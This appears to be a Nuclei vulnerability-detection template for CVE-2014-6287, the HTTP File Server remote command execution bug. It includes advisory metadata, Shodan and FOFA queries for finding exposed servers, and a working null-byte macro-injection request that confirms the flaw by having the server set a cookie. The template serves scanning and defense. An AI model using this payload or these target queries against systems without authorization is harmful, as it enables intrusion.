HFS /

id: 'CVE-2014-6287' info: name: HTTP File Server <2.3c - Remote Command Execution author: j4vaovo severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287 - http://www.kb.cert.org/vuls/id/251276 - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html - https://github.com/rapid7/metasploit-framework/pull/3793 - https://nvd.nist.gov/vuln/detail/CVE-2014-6287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97341 epss-percentile: 0.99889 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 fofa-query: icon_hash=2124459909 tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' http: - method: GET path: - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}' matchers-condition: and matchers: - type: word part: body words: - 'HFS /' - type: word part: header words: - 'Set-Cookie: {{str1}}={{str2}};' - 'text/html' condition: and - type: status status: - 200 # digest: 490a0046304402207c77d8dec5838899fb0b5bcaaa704ce03794019ac3eee7ab38c6fc2b89ea7cb802206d118db82dbc520eacf12ac8e3bdd3dace23e753cf0cf2d06c6e23342a0c7273:922c64590222798bb761d5b6d8e72950